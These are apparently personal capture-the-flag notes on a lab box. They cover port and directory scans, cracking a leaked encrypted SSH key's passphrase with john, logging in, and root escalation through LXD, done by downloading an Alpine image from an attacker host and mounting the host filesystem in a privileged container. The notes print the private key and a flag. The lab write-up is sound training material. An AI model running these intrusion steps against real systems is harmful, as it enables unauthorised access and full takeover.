┌──(kali㉿kali)-[~]
└─$ nmap 10.10.71.65 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-20 10:26 EDT
Nmap scan report for 10.10.71.65
Host is up (0.11s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http	username john from html comment

Nmap done: 1 IP address (1 host up) scanned in 17.36 seconds


john:?


┌──(kali㉿kali)-[~]
└─$ dirsearch -r -u 10.10.71.65 

  _|. _ _  _  _  _ _|_    v0.4.1
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10877

Output File: /home/kali/.dirsearch/reports/10.10.71.65/_21-06-20_10-27-14.txt

Error Log: /home/kali/.dirsearch/logs/errors-21-06-20_10-27-14.log

Target: http://10.10.71.65/

[10:27:15] Starting: 
[10:27:21] 403 -  276B  - /.ht_wsr.txt
[10:27:22] 403 -  276B  - /.htaccess.orig
[10:27:22] 403 -  276B  - /.htaccess_orig
[10:27:22] 403 -  276B  - /.htaccess.bak1
[10:27:22] 403 -  276B  - /.htaccessBAK
[10:27:22] 403 -  276B  - /.htaccess.save
[10:27:22] 403 -  276B  - /.htaccess_sc
[10:27:22] 403 -  276B  - /.htaccess.sample
[10:27:22] 403 -  276B  - /.htm
[10:27:22] 403 -  276B  - /.htpasswds
[10:27:22] 403 -  276B  - /.htaccess_extra
[10:27:22] 403 -  276B  - /.htpasswd_test
[10:27:22] 403 -  276B  - /.html
[10:27:22] 403 -  276B  - /.htaccessOLD2
[10:27:22] 403 -  276B  - /.httr-oauth
[10:27:22] 403 -  276B  - /.htaccessOLD
[10:27:24] 403 -  276B  - /.php
[10:27:34] 200 -    2KB - /about.php
[10:27:34] 200 -    1KB - /about.html
[10:27:54] 200 -    3KB - /index.html
[10:28:05] 200 -   33B  - /robots.txt
[10:28:06] 200 -  939B  - /secret/     (Added to queue)
[10:28:06] 301 -  311B  - /secret  ->  http://10.10.71.65/secret/
[10:28:06] 403 -  276B  - /server-status/     (Added to queue)
[10:28:06] 403 -  276B  - /server-status
[10:28:11] 301 -  312B  - /uploads  ->  http://10.10.71.65/uploads/
[10:28:11] 200 -    1KB - /uploads/     (Added to queue)
[10:28:14] Starting: secret/
[10:28:19] 403 -  276B  - /secret/.ht_wsr.txt
[10:28:19] 403 -  276B  - /secret/.htaccess.orig
[10:28:19] 403 -  276B  - /secret/.htaccess.sample
[10:28:19] 403 -  276B  - /secret/.htaccess.save
[10:28:19] 403 -  276B  - /secret/.htaccess_extra
[10:28:19] 403 -  276B  - /secret/.htaccess.bak1
[10:28:19] 403 -  276B  - /secret/.htaccess_sc
[10:28:19] 403 -  276B  - /secret/.htaccess_orig
[10:28:19] 403 -  276B  - /secret/.htaccessOLD2
[10:28:19] 403 -  276B  - /secret/.httr-oauth
[10:28:19] 403 -  276B  - /secret/.htaccessBAK
[10:28:19] 403 -  276B  - /secret/.html
[10:28:19] 403 -  276B  - /secret/.htpasswd_test
[10:28:19] 403 -  276B  - /secret/.htm
[10:28:19] 403 -  276B  - /secret/.htaccessOLD
[10:28:19] 403 -  276B  - /secret/.htpasswds
[10:28:21] 403 -  276B  - /secret/.php
[10:29:17] Starting: server-status/
[10:29:21] 404 -  273B  - /server-status/%2e%2e//google.com
[10:30:26] Starting: uploads/
[10:30:30] 403 -  276B  - /uploads/.ht_wsr.txt
[10:30:30] 403 -  276B  - /uploads/.htaccess.bak1
[10:30:30] 403 -  276B  - /uploads/.htaccess.sample
[10:30:30] 403 -  276B  - /uploads/.htaccess.save
[10:30:30] 403 -  276B  - /uploads/.htaccess_extra
[10:30:30] 403 -  276B  - /uploads/.htaccess.orig
[10:30:30] 403 -  276B  - /uploads/.htaccess_sc
[10:30:30] 403 -  276B  - /uploads/.htaccessBAK
[10:30:30] 403 -  276B  - /uploads/.htaccess_orig
[10:30:30] 403 -  276B  - /uploads/.htaccessOLD2
[10:30:30] 403 -  276B  - /uploads/.htaccessOLD
[10:30:30] 403 -  276B  - /uploads/.htm
[10:30:30] 403 -  276B  - /uploads/.html
[10:30:30] 403 -  276B  - /uploads/.htpasswd_test
[10:30:30] 403 -  276B  - /uploads/.httr-oauth
[10:30:30] 403 -  276B  - /uploads/.htpasswds
[10:30:32] 403 -  276B  - /uploads/.php

Task Completed
 


on uploads we get a ssh key with salt, 

put ssh2john on it and it returns letmein

                                                                                  
┌──(root💀kali)-[/hackme]
└─# john johntocrack                      
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
letmein          (id_rsa)
Proceeding with incremental:ASCII
letmein          (id_rsa)



ssh in with key and salt

┌──(kali㉿kali)-[/hackme]
└─$ ssh john@10.10.71.65 -i id_rsa
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-76-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Jun 20 14:35:03 UTC 2021

  System load:  0.01              Processes:           97
  Usage of /:   41.2% of 9.78GB   Users logged in:     0
  Memory usage: 17%               IP address for eth0: 10.10.71.65
  Swap usage:   0%


0 packages can be updated.
0 updates are security updates.


Last login: Mon Jul 27 20:17:26 2020 from 10.8.5.10
john@exploitable:~$ ls
user.txt
john@exploitable:~$ cat user.txt
a5c2ff8b9c2e3d4fe9d4ff2f1a5a6e7e

we get user.txt


john@exploitable:/$ cat etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
john:x:1000:1000:john:/home/john:/bin/bash
john@exploitable:/$ cat /etc/shadow
cat: /etc/shadow: Permission denied
john@exploitable:/$ ls la /etc/passwd
ls: cannot access 'la': No such file or directory
/etc/passwd
john@exploitable:/$ ls -la /etc/passwd
-rw-r--r-- 1 root root 1555 Feb  5  2020 /etc/passwd
john@exploitable:/$ 


trying to escalate, sudo -l nothing, maybe another shell, since we have an upload directory, looking to see where I can inject that, 












from directory secret,,

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,82823EE792E75948EE2DE731AF1A0547

T7+F+3ilm5FcFZx24mnrugMY455vI461ziMb4NYk9YJV5uwcrx4QflP2Q2Vk8phx
H4P+PLb79nCc0SrBOPBlB0V3pjLJbf2hKbZazFLtq4FjZq66aLLIr2dRw74MzHSM
FznFI7jsxYFwPUqZtkz5sTcX1afch+IU5/Id4zTTsCO8qqs6qv5QkMXVGs77F2kS
Lafx0mJdcuu/5aR3NjNVtluKZyiXInskXiC01+Ynhkqjl4Iy7fEzn2qZnKKPVPv8
9zlECjERSysbUKYccnFknB1DwuJExD/erGRiLBYOGuMatc+EoagKkGpSZm4FtcIO
IrwxeyChI32vJs9W93PUqHMgCJGXEpY7/INMUQahDf3wnlVhBC10UWH9piIOupNN
SkjSbrIxOgWJhIcpE9BLVUE4ndAMi3t05MY1U0ko7/vvhzndeZcWhVJ3SdcIAx4g
/5D/YqcLtt/tKbLyuyggk23NzuspnbUwZWoo5fvg+jEgRud90s4dDWMEURGdB2Wt
w7uYJFhjijw8tw8WwaPHHQeYtHgrtwhmC/gLj1gxAq532QAgmXGoazXd3IeFRtGB
6+HLDl8VRDz1/4iZhafDC2gihKeWOjmLh83QqKwa4s1XIB6BKPZS/OgyM4RMnN3u
Zmv1rDPL+0yzt6A5BHENXfkNfFWRWQxvKtiGlSLmywPP5OHnv0mzb16QG0Es1FPl
xhVyHt/WKlaVZfTdrJneTn8Uu3vZ82MFf+evbdMPZMx9Xc3Ix7/hFeIxCdoMN4i6
8BoZFQBcoJaOufnLkTC0hHxN7T/t/QvcaIsWSFWdgwwnYFaJncHeEj7d1hnmsAii
b79Dfy384/lnjZMtX1NXIEghzQj5ga8TFnHe8umDNx5Cq5GpYN1BUtfWFYqtkGcn
vzLSJM07RAgqA+SPAY8lCnXe8gN+Nv/9+/+/uiefeFtOmrpDU2kRfr9JhZYx9TkL
wTqOP0XWjqufWNEIXXIpwXFctpZaEQcC40LpbBGTDiVWTQyx8AuI6YOfIt+k64fG
rtfjWPVv3yGOJmiqQOa8/pDGgtNPgnJmFFrBy2d37KzSoNpTlXmeT/drkeTaP6YW
RTz8Ieg+fmVtsgQelZQ44mhy0vE48o92Kxj3uAB6jZp8jxgACpcNBt3isg7H/dq6
oYiTtCJrL3IctTrEuBW8gE37UbSRqTuj9Foy+ynGmNPx5HQeC5aO/GoeSH0FelTk
cQKiDDxHq7mLMJZJO0oqdJfs6Jt/JO4gzdBh3Jt0gBoKnXMVY7P5u8da/4sV+kJE
99x7Dh8YXnj1As2gY+MMQHVuvCpnwRR7XLmK8Fj3TZU+WHK5P6W5fLK7u3MVt1eq
Ezf26lghbnEUn17KKu+VQ6EdIPL150HSks5V+2fC8JTQ1fl3rI9vowPPuC8aNj+Q
Qu5m65A5Urmr8Y01/Wjqn2wC7upxzt6hNBIMbcNrndZkg80feKZ8RD7wE7Exll2h
v3SBMMCT5ZrBFq54ia0ohThQ8hklPqYhdSebkQtU5HPYh+EL/vU1L9PfGv0zipst
gbLFOSPp+GmklnRpihaXaGYXsoKfXvAxGCVIhbaWLAp5AybIiXHyBWsbhbSRMK+P
-----END RSA PRIVATE KEY-----


had a complete crash,,, lost some info on my notes, tried sudo,suid,enumerating, can't seem to escalate, 


PORT   STATE SERVICE
80/tcp open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /robots.txt: Robots file
|   /secret/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_  /uploads/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
| http-sql-injection: 
|   Possible sqli for queries:
|     http://10.10.71.65:80/uploads/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.71.65:80/uploads/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.71.65:80/uploads/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.71.65:80/uploads/?C=N%3bO%3dD%27%20OR%20sqlspider
|     http://10.10.71.65:80/uploads/?C=S%3bO%3dD%27%20OR%20sqlspider
|     http://10.10.71.65:80/uploads/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.71.65:80/uploads/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.71.65:80/uploads/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.71.65:80/uploads/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.71.65:80/uploads/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.71.65:80/uploads/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.71.65:80/uploads/?C=M%3bO%3dD%27%20OR%20sqlspider
|     http://10.10.71.65:80/uploads/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.71.65:80/uploads/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.71.65:80/uploads/?C=D%3bO%3dD%27%20OR%20sqlspider
|     http://10.10.71.65:80/uploads/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.71.65:80/uploads/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.71.65:80/uploads/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.71.65:80/uploads/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.71.65:80/uploads/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.71.65:80/uploads/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.71.65:80/uploads/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.71.65:80/uploads/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.71.65:80/uploads/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.71.65:80/uploads/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.71.65:80/uploads/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.71.65:80/uploads/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.71.65:80/uploads/?C=N%3bO%3dD%27%20OR%20sqlspider
|     http://10.10.71.65:80/uploads/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.71.65:80/uploads/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.71.65:80/uploads/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.71.65:80/uploads/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.71.65:80/uploads/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.71.65:80/uploads/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.71.65:80/uploads/?C=D%3bO%3dA%27%20OR%20sqlspider
|_    http://10.10.71.65:80/uploads/?C=M%3bO%3dA%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.

Nmap done: 1 IP address (1 host up) scanned in 35.33 seconds



https://www.exploit-db.com/exploits/46978


#LOCAL
git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine -a i686

#GAMINSERVER MACHINE

lxc image import https://10.6.65.43/alpine-v3.14-i686-20210620_1255.tar.gz --alias myimage		not sure this didn't work
wget 10.6.65.43:8000/alpine-v3.14-i686-20210620_1255.tar.gz						this worked, 

lxc image list

lxc init myimage sckull -c security.privileged=true
lxc config device add sckull mydevice disk source=/ path=/mnt/root recursive=true
lxc start sckull
lxc exec sckull /bin/sh

served the alpine image then created a exploit.sh file made it executable and we are root,,




from other write up

https://exhalior.github.io/GamingWriteup.html


After running this commmand, we should have an alpine.tar.gz in our attacker directory. This will be uploaded to the victim machine. As before with linpeas, we must start a python server on our attacker machine.

*ATTACKER MACHINE* sudo python3 -m http.server

And upload it to the victim.

*VICTIM MACHINE* wget attacker_ip:8000/alpine-v3.12-x86_64-20200831_1414.tar.gz

The exploit then requires that we run a script to complete the privesc, it’s on the exploit-db page linked above. What I did was create an sh script with:

nano exploit.sh

And copy paste the script from the exploit-db page to the script on the victims machine, and then chmod +x the script to make it executable.

chmod +x exploit.sh

Once we run the script, we should achieve the privesc and become root.

./exploit.sh -f alpine-v3.12-x86_64-20200831_1414.tar.gz
   